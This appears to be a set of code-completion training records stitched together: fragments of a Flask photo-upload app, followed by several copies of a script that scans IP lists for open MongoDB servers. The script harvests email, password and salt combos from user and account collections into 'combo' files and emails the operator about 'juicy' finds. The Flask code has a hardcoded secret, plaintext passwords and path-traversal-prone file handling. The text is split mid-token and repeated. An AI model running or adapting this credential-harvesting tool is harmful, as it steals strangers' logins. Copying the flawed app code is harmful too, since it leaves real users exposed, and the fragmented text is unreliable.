raise None
app = Flask(__name__)
app.json_encoder = JSONEncoder
app.config.from_object(config)
app.config['SECRET_KEY'] = 'I have a dream'
address = 'C:\\Users\\Administrator\\Desktop\\images\\static\\'
app.config['UPLOADED_PHOTOS_DEST'] = address
app.config['MAX_CONTENT_LENGTH'] = 200 * 1024 * 1024
db = SQLAlchemy(app)
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
patch_request_class(app, size=None) # set maximum file size, default is 16MB
class UploadForm(FlaskForm):
photo = FileField(validators=[FileAllowed(photos, u'只能是照片格式!'), FileRequired(u'Choose a file!')])
submit = SubmitField(u'上传')
@app.route('/', methods=['GET', 'POST'])
def index():
return render_template('index.html')
@app.route('/index', methods=['GET', 'POST'])
def upload_file():
folder_name = request.form.get('folderName')
# form = UploadForm()
folder = address + folder_name
tasks = Task.query.filter_by(folder_name=folder_name).all()
if len(tasks) == 0:
task = Task(folder_name=folder_name, size=len(request.files.getlist('photo')), status='0', place='1-2', create_time=datetime.now())
# 调用添加方法
db.session.add(task)
db.session.commit()
else:
task = Task.query.filter_by(folder_name=folder_name).first()
task.size = str(int(task.size) + len(request.files.getlist('photo')))
db.session.commit()
if not os.path.exists(folder):
os.makedirs(folder)
full_path = folder + '\\names.txt'
file = open(full_path, 'a')
# create_excel(len(request.files.getlist('photo')))
for filename in request.files.getlist('photo'):
name = filename.filename
file.write(name + '\n')
photos.save(filename, folder=folder, name=name)
task = Task.query.filter_by(folder_name=folder_name).first()
return jsonify(task)
if __name__ == '__main__':
app.run(host='0.0.0.0', port=8080, debug=True)
# app.run(debug=True)
@app.route('/page_list', methods=['GET', 'POST'])
def page_list():
user_id = request.headers.get('Authorization',None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
if not os.path.exists(folder_name):
return jsonify(0)
files_list = os.listdir(folder_name)
return jsonify(len(files_list) - 3)
def create_excel(size, folder_name):
# 新建一个Excel文件
wb = openpyxl.Workbook()
ws1 = wb.active
for i in range(size - 1):
ws1.cell(row=i+1, column=i+1, value=1)
wb.save((folder_name + '\\data.xlsx'))
workbook = xlsxwriter.Workbook(folder_name + '\\result.xlsx')
workbook.close()
@app.route('/submit', methods=['GET', 'POST'])
def submit():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.status = 3
db.session.commit()
folder_name = address + task.folder_name
filename = folder_name + "\\data.xlsx"
arr = []
ex = xlrd.open_workbook(filename).sheets()[0]
for i in range(ex.nrows):
col = ex.row_values(i)
for index, n in enumerate(col):
if isinstance(n, str):
col[index] = 0
arr.append(col)
M = np.array(arr)
obj = AHP(M)
evec = obj.get_evec(obj.supp_mat(M))
obj.save_result(evec, folder_name)
return jsonify("success")
@app.route('/update_excel/<row>/<line>/<value>', methods=['GET', 'POST'])
def update_excel(row, line, value):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
task.place = str(row) + '-' + str(line)
db.session.commit()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
xls = xlrd.open_workbook(folder_name + '\\data.xlsx')
xlsc = copy(xls)
shtc = xlsc.get_sheet(0)
shtc.write(int(row), int(line), int(value))
xlsc.save(folder_name + '\\data.xlsx')
return jsonify("success")
@app.route('/open/<filename>', methods=['GET', 'POST'])
def open_file(filename):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
line = getline(folder_name + "\\names.txt", int(filename))
name = line.replace("\n", "")
global app
app.config['UPLOADED_PHOTOS_DEST'] = folder_name
global photos
photos = UploadSet('photos', IMAGES)
configure_uploads(app, photos)
file_url = photos.url(name)
return jsonify(file_url)
@app.route('/delete/<filename>')
def delete_file(filename):
file_path = photos.path(filename)
os.remove(file_path)
return render_template('manage.html', files_list=files_list)
@app.route('/download/<folder_name>/<filename>', methods=['GET', 'POST'])
def download(folder_name, filename):
folder_name = address + folder_name
# filename = folder_name + "\\data.xlsx"
# arr = []
# ex = xlrd.open_workbook(filename).sheets()[0]
# for i in range(ex.nrows):
# col = ex.row_values(i)
# for index, n in enumerate(col):
# if isinstance(n, str):
# col[index] = 0
# arr.append(col)
# M = np.array(arr)
# obj = AHP(M)
# evec = obj.get_evec(obj.supp_mat(M))
# obj.save_result(evec, folder_name)
return send_from_directory(folder_name, filename=filename, as_attachment=True)
@app.route('/getTaskBean', methods=['GET'])
def get_task_bean():
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
return jsonify(task)
def getline(the_file_path, line_number):
if line_number < 1:
return ''
for cur_line_number, line in enumerate(open(the_file_path, 'rU')):
if cur_line_number == line_number-1:
return line
return ''
@app.route('/getValue/<row>/<line>', methods=['GET', 'POST'])
def get_excel(row, line):
user_id = request.headers.get('Authorization', None)
task = Task.query.filter_by(user_id=user_id, status=2).first()
folder_name = address + task.folder_name
row = int(row) - 1
line = int(line) - 1
x1 = xlrd.open_workbook(folder_name + '\\data.xlsx')
sheet1 = x1.sheet_by_index(0)
a12 = sheet1.cell_value(row, line)
return jsonify(a12)
@app.route('/login', methods=['POST'])
def login():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
user = User.query.filter_by(username=username, password=password).all()
if len(user) == 1:
return jsonify({'status':'ok','info':'%s登录成功'%username,'session':user[0].id,'role':user[0].role})
return jsonify({'status':'no','info':'登录失败'})
@app.route('/registry', methods=['POST'])
def registry():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
username = json_data.get("username")
password = json_data.get("password")
users = User.query.filter_by(username=username).all()
if len(users) > 0:
return jsonify({'status':'no','info':'%s注册失败'%username})
else:
user = User(username=username, password=password, role=1)
# 调用添加方法
db.session.add(user)
db.session.commit()
return jsonify({'status':'ok','info':'%s注册成功'%username,'session':username,'role':1})
@app.route('/getTask', methods=['GET'])
def get_task():
tasks = Task.query.order_by(Task.create_time.desc()).all()
return jsonify(tasks)
@app.route('/getUsers', methods=['GET'])
def get_users():
users = User.query.all()
return jsonify(users)
@app.route('/deleteTask/<task_id>', methods=['GET'])
def delete_task(task_id):
task = Task.query.filter_by(id=task_id).first()
folder_name = address + task.folder_name
shutil.rmtree(path=folder_name)
Task.query.filter_by(id=task_id).delete()
db.session.commit()
return jsonify('success')
@app.route('/updateTask', methods=['POST'])
def update_task():
data = request.get_data()
json_data = json.loads(data.decode("utf-8"))
task_id = json_data.get("id")
user_id = json_data.get("user_id")
status = json_data.get("status")
folder_name = json_data.get("folder_name")
if int(status) == 2:
files_list = os.listdir(address + str(folder_name))
create_excel(len(files_list), address + str(folder_name))
task = Task.query.filter_by(id=task_id).first()
task.user_id = user_id
task.status = status
db.session.commit()
# user_id = request.headers.get('Authorization',None)
users = User.query.all()
return jsonify(users)
class User(db.Model):
__tablename__ = 'user'
id = db.Column(db.Integer, primary_key= | , autoincrement=True)
username = db.Column(db.String(100), nullable=False)
password = db.Column(db.String(100), nullable=False)
role = db.Column(db.String(100), nullable=False)
def keys(self):
return ['id', 'username', 'password', 'role']
def __getitem__(self, item):
return getattr(self, item)
class Task(db.Model):
__tablename__ = 'task'
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
user_id = db.Column(db.String(100), nullable=False)
folder_name = db.Column(db.String(100), nullable=False)
status = db.Column(db.String(100), nullable=False)
size = db.Column(db.String(100), nullable=False)
place = db.Column(db.String(100), nullable=False)
create_time = db.Column(db.DateTime, nullable=False) # 发送时间
def keys(self):
return ['id', 'user_id', 'folder_name', 'status', 'size', 'place', 'create_time']
def __getitem__(self, item):
return getattr(self, item)
| True | identifier_name |
mongodb-scraper.py | # coding=utf-8
import argparse
import logging
import logging.handlers
import json
import re
from colorlog import ColoredFormatter
from pymongo import MongoClient
from pymongo import errors as mongo_errors
import io
import os
import smtplib
from email.mime.text import MIMEText
class MongodbScraper:
def __init__(self):
# Init class variables
self.settings = {}
self.ips = []
self.processed = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
        # Create a rotating log handler, so we won't have an endless file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists
if not os.path.exists('data'):
os.makedirs('data')
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
|
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def scrape(self):
for ip in self.ips:
            # Have I already processed this IP?
if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
                    # Is this a collection I'm interested in?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
                            # Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
                        # If we find anything that resembles an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
                                # Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info("\t\tWriting " + '{:,}'.format(counter) + "/" + '{:,}'.format(total) + " records")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
lines = []
except mongo_errors.ExecutionTimeout:
self.logger.warning("Cursor timed out, skipping")
except mongo_errors.BSONError:
self.logger.warning("Error while fetching cursor data, skipping")
except KeyError:
self.logger.warning("Manually skipping recordset")
except:
self.logger.warning("A generic error occurred while iterating over the cursors. Skipping")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
client.close()
self.processed.append(ip)
with open('processed.json', 'w') as processed_json:
json.dump(self.processed, processed_json)
if __name__ == '__main__':
scraper = MongodbScraper()
scraper.scrape()
| try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return | identifier_body |
mongodb-scraper.py | # coding=utf-8
import argparse
import logging
import logging.handlers
import json
import re
from colorlog import ColoredFormatter
from pymongo import MongoClient
from pymongo import errors as mongo_errors
import io
import os
import smtplib
from email.mime.text import MIMEText
class MongodbScraper:
def __init__(self):
# Init class variables
self.settings = {}
self.ips = []
self.processed = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
        # Create a rotating log handler, so we won't have an endless file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists
if not os.path.exists('data'):
os.makedirs('data')
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
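            # Roll over to combo_1.txt ... combo_99.txt once the current file passes 20 MB.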
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def | (self):
for ip in self.ips:
            # Have I already processed this IP?
if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
                    # Is this a collection I'm interested in?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
                            # Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
                        # If we find anything that resembles an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
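                    # Stream the collection in batches of 500 documents and cap server-side
                    # execution at 10 seconds so one huge or slow collection can't stall the run.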
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
                                # Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info("\t\tWriting " + '{:,}'.format(counter) + "/" + '{:,}'.format(total) + " records")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
lines = []
except mongo_errors.ExecutionTimeout:
self.logger.warning("Cursor timed out, skipping")
except mongo_errors.BSONError:
self.logger.warning("Error while fetching cursor data, skipping")
except KeyError:
self.logger.warning("Manually skipping recordset")
except:
self.logger.warning("A generic error occurred while iterating over the cursors. Skipping")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
client.close()
self.processed.append(ip)
with open('processed.json', 'w') as processed_json:
json.dump(self.processed, processed_json)
if __name__ == '__main__':
scraper = MongodbScraper()
scraper.scrape()
| scrape | identifier_name |
mongodb-scraper.py | # coding=utf-8
import argparse
import logging
import logging.handlers
import json
import re
from colorlog import ColoredFormatter
from pymongo import MongoClient
from pymongo import errors as mongo_errors
import io
import os
import smtplib
from email.mime.text import MIMEText
class MongodbScraper:
def __init__(self):
# Init class variables
self.settings = {}
self.ips = []
self.processed = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
        # Create a rotating log handler, so we won't have an endless file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists |
# Load previous data
self._load_data()
# Let's parse some CLI options
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', help='Supply a comma separated string of IPs that should be skipped')
arguments = parser.parse_args()
if arguments.skip:
skip = arguments.skip.split(',')
self.processed += skip
# Load settings
self._load_settings()
def _load_data(self):
self.logger.info("Opening data")
try:
with open('data.json', 'r') as data_json:
self.ips = json.load(data_json)
except (IOError, ValueError):
raise RuntimeError("Please provide a valid JSON encoded file in data.json")
self.logger.info("Found " + str(len(self.ips)) + " IPs to connect")
try:
with open('processed.json', 'r') as processed_json:
self.processed = json.load(processed_json)
except (IOError, ValueError):
# Meh, I'll live with that...
pass
if self.processed:
self.logger.info("Found " + str(len(self.processed)) + " already processed IP")
def _load_settings(self):
try:
with open('settings.json', 'r') as settings_json:
self.settings = json.load(settings_json)
self.logger.info("Settings file found")
except (IOError, ValueError):
self.logger.info("Settings file not found")
def _notify(self, ip, collection, count):
try:
threshold = self.settings['email']['threshold']
except KeyError:
# No key set
return
# Result is not interesting enough
if count < threshold:
return
# Do I have all the required strings?
try:
email_from = self.settings['email']['from']
email_to = self.settings['email']['to']
host = self.settings['email']['smtp']['host']
port = self.settings['email']['smtp']['port']
user = self.settings['email']['smtp']['user']
password = self.settings['email']['smtp']['password']
except KeyError:
return
# Ok, but are they really set?
if not all([email_from, email_to, host, port, user, password]):
return
# Ok, we're good to go
body = """
Hi Dude!
I have just found a juicy collection!
IP: {0}
Collection: {1}
Rows: {2}
"""
body = body.format(ip, collection, count)
mailer = smtplib.SMTP(host, str(port), timeout=10)
mailer.starttls()
mailer.login(user=user, password=password)
message = MIMEText(body)
message['Subject'] = 'Juicy collection at ' + ip
message['From'] = email_from
message['To'] = email_to
try:
mailer.sendmail(email_from, [email_to], message.as_string())
mailer.quit()
except smtplib.SMTPException:
return
def _check_datafile(self):
size = 0
if os.path.exists('data/' + self.filename):
size = os.path.getsize('data/' + self.filename)
# Did the file grow too large?
if size > (20 * 1024 * 1024):
i = 0
while i < 100:
i += 1
combo_file = 'combo_' + str(i) + '.txt'
if not os.path.exists('data/' + combo_file):
self.filename = combo_file
break
def scrape(self):
for ip in self.ips:
            # Have I already processed this IP?
if ip in self.processed:
continue
self.logger.info("Connecting to " + ip)
try:
client = MongoClient(ip, connectTimeoutMS=5000)
dbs = client.database_names()
except (KeyboardInterrupt, SystemExit):
return
except:
self.logger.warning("An error occurred while connecting to " + ip + ". Skipping")
# Don't cry if we can't connect to the server
self.processed.append(ip)
continue
for db in dbs:
# Skip local system databases
if db in ['admin', 'local']:
continue
self.logger.debug("\t\tAnalyzing db: " + db)
o_db = client[db]
try:
collections = o_db.collection_names()
except (KeyboardInterrupt, SystemExit):
return
except Exception:
# Don't cry if something bad happens
self.logger.warning("\tAn error occurred while fetching collections from " + ip + ". Skipping.")
break
for collection in collections:
if collection in ['system.indexes']:
continue
self.logger.debug("\t\tAnalyzing collection: " + collection)
                    # Is this a collection I'm interested in?
if not any(table in collection for table in self.table_names):
continue
o_coll = o_db[collection]
try:
row = o_coll.find_one()
except:
# Sometimes the collection is broken, let's skip it
continue
interesting = False
# If the collection is empty I get a null row
if row:
for key, value in row.iteritems():
                            # Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Only consider plain strings, nothing fancy
if isinstance(value, basestring):
interesting = True
break
# This collection has no interesting data? Let's skip it
if not interesting:
continue
self.logger.info("** Table with interesting data found")
# Check if the current data file is too large
self._check_datafile()
# Ok there is interesting data inside it. Let's find if there is an email address, too
# I'll just check the first record and hope there is something similar to an email address.
email_field = ''
salt_field = ''
for key, value in row.iteritems():
                        # If we find anything that resembles an email address, let's store it
if isinstance(value, basestring):
try:
if re.match(self.email_regex, value.encode('utf-8')):
email_field = key
if 'salt' in key.lower():
salt_field = key
except UnicodeDecodeError:
pass
rows = o_coll.find(batch_size=500).max_time_ms(10000)
total = rows.count()
if total > 750:
self.logger.info("***FOUND COLLECTION WITH " + '{:,}'.format(total) + " RECORDS. JUICY!!")
self._notify(ip, collection, total)
lines = []
counter = 0
try:
for row in rows:
counter += 1
try:
email = row[email_field].encode('utf-8')
if not email:
email = ''
except:
email = ''
# Try to fetch the salt, if any
try:
salt = row[salt_field].encode('utf-8')
if not salt:
salt = ''
except:
salt = ''
for key, value in row.iteritems():
try:
# Skip fields marked as emails / salt
if key in [email_field, salt_field]:
continue
                                # Is that a column we're interested in?
if any(column in key for column in self.column_names):
# Skip empty values
if not value:
continue
# Skip fields that are not strings (ie reset_pass_date => datetime object)
if not isinstance(value, basestring):
continue
value = value.encode('utf-8') + ':' + salt
lines.append(unicode(ip.encode('utf-8') + '|' + email + ':' + value + '\n'))
except UnicodeDecodeError:
# You know what? I'm done dealing with all those crazy encodings
self.logger.warn("An error occurred while encoding the string. Skipping")
continue
# If I get a very long list, let's write it in batches
if len(lines) >= 1000:
self.logger.info("\t\tWriting " + '{:,}'.format(counter) + "/" + '{:,}'.format(total) + " records")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
lines = []
except mongo_errors.ExecutionTimeout:
self.logger.warning("Cursor timed out, skipping")
except mongo_errors.BSONError:
self.logger.warning("Error while fetching cursor data, skipping")
except KeyError:
self.logger.warning("Manually skipping recordset")
except:
self.logger.warning("A generic error occurred while iterating over the cursors. Skipping")
with io.open('data/' + self.filename, 'a', encoding='utf-8') as fp_pass:
fp_pass.writelines(lines)
client.close()
self.processed.append(ip)
with open('processed.json', 'w') as processed_json:
json.dump(self.processed, processed_json)
if __name__ == '__main__':
scraper = MongodbScraper()
scraper.scrape() | if not os.path.exists('data'):
os.makedirs('data') | random_line_split |
mongodb-scraper.py | # coding=utf-8
import argparse
import logging
import logging.handlers
import json
import re
from colorlog import ColoredFormatter
from pymongo import MongoClient
from pymongo import errors as mongo_errors
import io
import os
import smtplib
from email.mime.text import MIMEText
class MongodbScraper:
def __init__(self):
# Init class variables
self.settings = {}
self.ips = []
self.processed = []
self.table_names = ['account', 'user', 'subscriber', 'customer']
self.column_names = ['pass', 'pwd']
self.email_regex = re.compile(r'[a-z0-9\-\._]+@[a-z0-9\-\.]+\.[a-z]{2,4}')
self.filename = 'combo.txt'
# Init the logger
self.logger = logging.getLogger('mongodb-scraper')
self.logger.setLevel(logging.DEBUG)
        # Create a rotating log handler, so we won't have an endless file
rotate = logging.handlers.RotatingFileHandler(
'mongodb-scraper.log', maxBytes=(5 * 1024 * 1024), backupCount=3)
rotate.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s|%(levelname)-8s| %(message)s')
rotate.setFormatter(formatter)
self.logger.addHandler(rotate)
console = logging.StreamHandler()
console.setLevel(logging.INFO)
formatter = ColoredFormatter("%(log_color)s%(asctime)s|[%(levelname)-4s] %(message)s%(reset)s", "%H:%M:%S")
console.setFormatter(formatter)
self.logger.addHandler(console)
# Check that the data dir exists
